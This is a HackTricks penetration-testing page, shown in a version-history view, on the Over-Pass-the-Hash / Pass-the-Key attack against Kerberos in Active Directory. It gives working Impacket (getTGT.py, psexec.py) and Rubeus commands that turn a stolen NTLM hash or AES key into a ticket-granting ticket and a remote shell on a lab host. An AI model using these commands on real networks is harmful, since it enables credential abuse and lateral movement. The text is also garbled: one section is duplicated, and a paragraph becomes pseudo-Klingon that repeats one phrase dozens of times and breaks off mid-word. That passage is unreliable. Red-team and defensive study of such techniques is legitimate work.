hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

65 lines
11 KiB
Markdown
Raw Permalink Normal View History

2022-08-13 23:06:40 +00:00
# Over Pass the Hash/Pass the Key
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 17:52:19 +00:00
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-02-08 03:06:37 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-12-05 22:29:21 +00:00
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>
2022-08-13 23:06:40 +00:00
## Overpass The Hash/Pass The Key (PTK)
2022-04-28 16:01:33 +00:00
2024-02-08 03:06:37 +00:00
The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.
2024-02-08 03:06:37 +00:00
To execute this attack, the initial step involves acquiring the NTLM hash or password of the targeted user's account. Upon securing this information, a Ticket Granting Ticket (TGT) for the account can be obtained, allowing the attacker to access services or machines to which the user has permissions.
2024-02-08 03:06:37 +00:00
The process can be initiated with the following commands:
```bash
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
```
2024-02-10 17:52:19 +00:00
### Over-Pass-the-Hash / Pass-the-Key
2024-02-08 03:06:37 +00:00
For scenarios necessitating AES256, the `-aesKey [AES key]` option can be utilized. Moreover, the acquired ticket might be employed with various tools, including smbexec.py or wmiexec.py, broadening the scope of the attack.
2024-02-08 03:06:37 +00:00
Encountered issues such as _PyAsn1Error_ or _KDC cannot find the name_ are typically resolved by updating the Impacket library or using the hostname instead of the IP address, ensuring compatibility with the Kerberos KDC.
2024-02-08 03:06:37 +00:00
An alternative command sequence using Rubeus.exe demonstrates another facet of this technique:
2024-02-10 17:52:19 +00:00
### Over-Pass-the-Hash / Pass-the-Key
For scenarios necessitating AES256, the `-aesKey [AES key]` option can be utilized. Moreover, the acquired ticket might be employed with various tools, including smbexec.py or wmiexec.py, broadening the scope of the attack.
Encountered issues such as _PyAsn1Error_ or _KDC cannot find the name_ are typically resolved by updating the Impacket library or using the hostname instead of the IP address, ensuring compatibility with the Kerberos KDC.
An alternative command sequence using Rubeus.exe demonstrates another facet of this technique:
2024-02-08 03:06:37 +00:00
```bash
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
```
2024-02-10 17:52:19 +00:00
**Pass the Key** yIqemnIS, 'ej 'oH 'e' vItlhutlhlaHbe'chugh, 'ej 'oH authentication purposes. 'ach, 'oHmey Windows systems prefer AES256, 'ach 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chugh, 'ej 'oHmey 'e' vItlhutlhlaHbe'chug
2022-08-13 23:06:40 +00:00
```bash
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
```
2022-10-04 14:07:17 +00:00
## References
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-02-09 00:38:08 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-02-08 03:06:37 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-12-05 22:29:21 +00:00
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>